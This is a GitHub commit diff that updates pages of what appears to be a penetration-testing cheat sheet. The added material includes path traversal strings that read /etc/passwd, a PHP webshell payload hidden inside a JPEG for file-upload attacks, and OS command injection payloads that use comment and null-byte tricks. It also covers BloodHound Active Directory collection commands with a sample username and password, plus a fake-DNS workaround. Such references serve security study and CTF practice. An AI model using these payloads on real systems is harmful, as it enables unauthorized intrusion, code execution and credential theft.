Skip to content

Commit

Permalink
updated some techniques
Browse files Browse the repository at this point in the history
  • Loading branch information
hideckies committed Dec 12, 2024
1 parent 7cf115b commit bda6807
Show file tree
Hide file tree
Showing 6 changed files with 78 additions and 32 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ description: Buffer overflow occurs when a program attempts to write more data t
tags:
- Reverse Engineering
refs:
date: 2023-08-14
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -172,10 +172,10 @@ r.interactive()

<br />

## Shellcode
## Shellcode Injection

We can create the crafted shell code and override the address to execute the shell code.
Use **Pwntools** to create the shell code.
We can create the crafted shellcode and override the address to execute the shellcode.
Use **Pwntools** to create the shellcode.

```python
from pwn import *
Expand Down
3 changes: 2 additions & 1 deletion src/exploit/web/security-risk/file-inclusion.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ tags:
- Web
refs:
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
date: 2024-11-08
date: 2024-12-12
draft: false
---

Expand All @@ -16,6 +16,7 @@ draft: false
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..././..././..././..././etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
Expand Down
21 changes: 20 additions & 1 deletion src/exploit/web/security-risk/file-upload-attack.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ tags:
refs:
- https://docstore.mik.ua/orelly/web2/wdesign/ch19_01.htm
- https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da
date: 2024-10-25
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -250,6 +250,25 @@ RIFF????WAVE

<br />

## Combine payload into image file

The payload can be executed by combining into an image file data.
For example, generate a blank image file at first:

```bash
convert -size 32x32 xc:white test.jpg
```

And then we can put our payload to the end of the image data:

```txt
ÿØÿàJFIFHHÿÛC
$.' ",#(7),01444'9=82<.342ÿÀ ÿÄÿÄÿÚ?
<?php echo system("whoami");?>
```

<br />

## Zip

If target website restricts uploads to zip files only, the website (server) may unzip uploaded files internally and displays the result of decompressed file somewhere e.g. `/upload/example.txt`.
Expand Down
18 changes: 17 additions & 1 deletion src/exploit/web/security-risk/os-command-injection.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ tags:
- Reverse Shell
- Web
refs:
date: 2024-10-25
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -38,6 +38,8 @@ If the payload includes whitespaces (**' '**), we need to change it to **'+'** o
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home
<!-- Comment out at the end to ignore subsequent command/code. -->
?cmd=ls /home #
/?cmd=`ping -c 1 10.0.0.1`
Expand Down Expand Up @@ -85,6 +87,20 @@ We may be able to bypass specific character filter by encoding them.

<br />

## Null-terminator

Sometimes, we need to put a null-terminator to ignore subsequent code given by the target application.

```bash
# URL encoding (%00)
?cmd=ls /home%00
# Escape sequence (\0, \00)
?cmd=ls /home\0
?cmd=ls /home\00
```

<br />

## Bypass Whitespace Filter

Reference: [https://www.ctfnote.com/web/os-command-injection/whitespace-bypass](https://www.ctfnote.com/web/os-command-injection/whitespace-bypass)
Expand Down
57 changes: 34 additions & 23 deletions src/exploit/windows/active-directory/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ tags:
refs:
- https://tryhackme.com/room/adenumeration
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
date: 2024-12-06
date: 2024-12-12
draft: false
---

Expand All @@ -32,6 +32,7 @@ The following command starts the Docker Compose of the BloodHound.

```bash
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up
```

Expand All @@ -45,32 +46,42 @@ export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
```

### 2. Collect Data with BloodHound.py
### 2. Collect Data

Here we use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).
Install it as follow:
- **Option1. Using NetExec**

```sh
python3 -m venv venv
source venv/bin/activate
pip3 install bloodhound
bloodhound-python -h
```
If you already have `NetExec` in your machine, I think it is the most easiest way.

Then
```sh
netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
```

```bash
# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local

# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
```
- **Option2. Using BloodHound.py**

We can also use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).
Install it as follow:

```sh
python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # or using 'pip3' instead of 'pipx'
bloodhound-python -h
```

Then collect data:

```bash
# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local
# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
```

### 3. Upload Collected Data

Expand Down
3 changes: 1 addition & 2 deletions src/exploit/windows/privilege-escalation/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ tags:
refs:
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
date: 2024-12-06
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -252,7 +252,6 @@ We might be able to find interesting information about users by checking histori
VSS coordinates the actions that are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

```powershell
vssadmin
vssadmin list shadows
vssadmin list volumes
```
Expand Down

0 comments on commit bda6807

Please sign in to comment.